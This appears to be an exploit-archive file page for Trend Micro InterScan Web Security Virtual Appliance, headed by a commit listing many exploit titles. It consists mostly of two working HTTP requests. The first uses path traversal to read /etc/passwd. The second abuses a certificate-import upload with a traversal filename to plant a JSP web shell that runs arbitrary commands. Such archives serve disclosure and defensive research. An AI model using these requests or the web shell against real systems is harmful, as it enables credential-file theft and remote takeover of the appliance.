880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
219 lines
No EOL
4.7 KiB
Text
219 lines
No EOL
4.7 KiB
Text
source: https://www.securityfocus.com/bid/41072/info
|
|
|
|
Trend Micro InterScan Web Security Virtual Appliance is prone to multiple vulnerabilities.
|
|
|
|
Exploiting these issues can allow an attacker to download or upload arbitrary files to the system. This may aid in further attacks.
|
|
|
|
Firmware versions prior to Trend Micro InterScan Web Security Virtual Appliance Critical Build 1386 are vulnerable.
|
|
|
|
==============================download==============================
|
|
|
|
POST /servlet/com.trend.iwss.gui.servlet.exportreport HTTP/1.1
|
|
|
|
Host: xxx.xxx.xx.xx:1812
|
|
|
|
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8
|
|
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
|
|
Accept-Language: en-us,en;q=0.5
|
|
|
|
Accept-Encoding: gzip,deflate
|
|
|
|
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
|
|
|
|
Keep-Alive: 300
|
|
|
|
Proxy-Connection: keep-alive
|
|
|
|
Referer: http://xxx.xxx.xx.xx:1812/summary_threat.jsp
|
|
|
|
Cookie: JSESSIONID=D122F55EA4D2A5FA1E7AE4582085F370
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
Content-Length: 99
|
|
|
|
|
|
|
|
op=refresh&summaryinterval=7&exportname=../../../../../../../../../../etc/passwd&exportfilesize=443
|
|
|
|
|
|
|
|
==============================upload==============================
|
|
|
|
POST /servlet/com.trend.iwss.gui.servlet.XMLRPCcert?action=import HTTP/1.1
|
|
|
|
Host: xx.xx.xx.xx:1812
|
|
|
|
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8
|
|
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
|
|
Accept-Language: en-us,en;q=0.5
|
|
|
|
Accept-Encoding: gzip,deflate
|
|
|
|
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
|
|
|
|
Keep-Alive: 300
|
|
|
|
Proxy-Connection: keep-alive
|
|
|
|
Referer: http://xx.xx.xx.xx:1812
|
|
|
|
Cookie: JSESSIONID=9072F5BC86BD450CFD8B88613FFD2F80
|
|
|
|
Content-Type: multipart/form-data; boundary=---------------------------80377104394420410598722900
|
|
|
|
Content-Length: 2912
|
|
|
|
|
|
|
|
-----------------------------80377104394420410598722900
|
|
|
|
Content-Disposition: form-data; name="op"
|
|
|
|
save
|
|
|
|
-----------------------------80377104394420410598722900
|
|
|
|
Content-Disposition: form-data; name="defaultca"
|
|
|
|
yes
|
|
|
|
-----------------------------80377104394420410598722900
|
|
|
|
Content-Disposition: form-data; name="importca_certificate"; filename="../../../../../../../../../../../../../../../../../usr/iwss/AdminUI/tomcat/webapps/ROOT/cmd.jsp"
|
|
|
|
|
|
|
|
Content-Type: application/octet-stream
|
|
|
|
|
|
|
|
<%@ page import="java.util.*,java.io.*"%>
|
|
|
|
<%%>
|
|
|
|
<HTML><BODY>
|
|
|
|
<FORM METHOD="GET" NAME="myform" ACTION="">
|
|
|
|
<INPUT TYPE="text" NAME="cmd">
|
|
|
|
<INPUT TYPE="submit" VALUE="Send">
|
|
|
|
</FORM>
|
|
|
|
<pre>
|
|
|
|
<%
|
|
|
|
if (request.getParameter("cmd") != null) {
|
|
|
|
out.println("Command: " + request.getParameter("cmd") + "<BR>");
|
|
|
|
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
|
|
|
|
OutputStream os = p.getOutputStream();
|
|
|
|
InputStream in = p.getInputStream();
|
|
|
|
DataInputStream dis = new DataInputStream(in);
|
|
|
|
String disr = dis.readLine();
|
|
|
|
while ( disr != null ) {
|
|
|
|
out.println(disr);
|
|
|
|
disr = dis.readLine();
|
|
|
|
}
|
|
|
|
}
|
|
|
|
%>
|
|
|
|
</pre>
|
|
|
|
</BODY></HTML>
|
|
|
|
-----------------------------80377104394420410598722900
|
|
|
|
Content-Disposition: form-data; name="importca_key"; filename="../../../../../../../../../../../../../../../../../usr/iwss/AdminUI/tomcat/webapps/ROOT/cmd.jsp"
|
|
|
|
|
|
|
|
<%@ page import="java.util.*,java.io.*"%>
|
|
|
|
<%%>
|
|
|
|
<HTML><BODY>
|
|
|
|
<FORM METHOD="GET" NAME="myform" ACTION="">
|
|
|
|
<INPUT TYPE="text" NAME="cmd">
|
|
|
|
<INPUT TYPE="submit" VALUE="Send">
|
|
|
|
</FORM>
|
|
|
|
<pre>
|
|
|
|
<%
|
|
|
|
if (request.getParameter("cmd") != null) {
|
|
|
|
out.println("Command: " + request.getParameter("cmd") + "<BR>");
|
|
|
|
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
|
|
|
|
OutputStream os = p.getOutputStream();
|
|
|
|
InputStream in = p.getInputStream();
|
|
|
|
DataInputStream dis = new DataInputStream(in);
|
|
|
|
String disr = dis.readLine();
|
|
|
|
while ( disr != null ) {
|
|
|
|
out.println(disr);
|
|
|
|
disr = dis.readLine();
|
|
|
|
}
|
|
|
|
}
|
|
|
|
%>
|
|
|
|
</pre>
|
|
|
|
</BODY></HTML>
|
|
|
|
-----------------------------80377104394420410598722900
|
|
|
|
Content-Disposition: form-data; name="importca_passphrase"
|
|
|
|
|
|
|
|
test
|
|
|
|
|
|
|
|
-----------------------------80377104394420410598722900
|
|
|
|
Content-Disposition: form-data; name="importca_2passphrase"
|
|
|
|
test
|
|
|
|
-----------------------------80377104394420410598722900
|
|
|
|
Content-Disposition: form-data; name="beErrMsg"
|
|
|
|
imperr
|
|
|
|
-----------------------------80377104394420410598722900-- |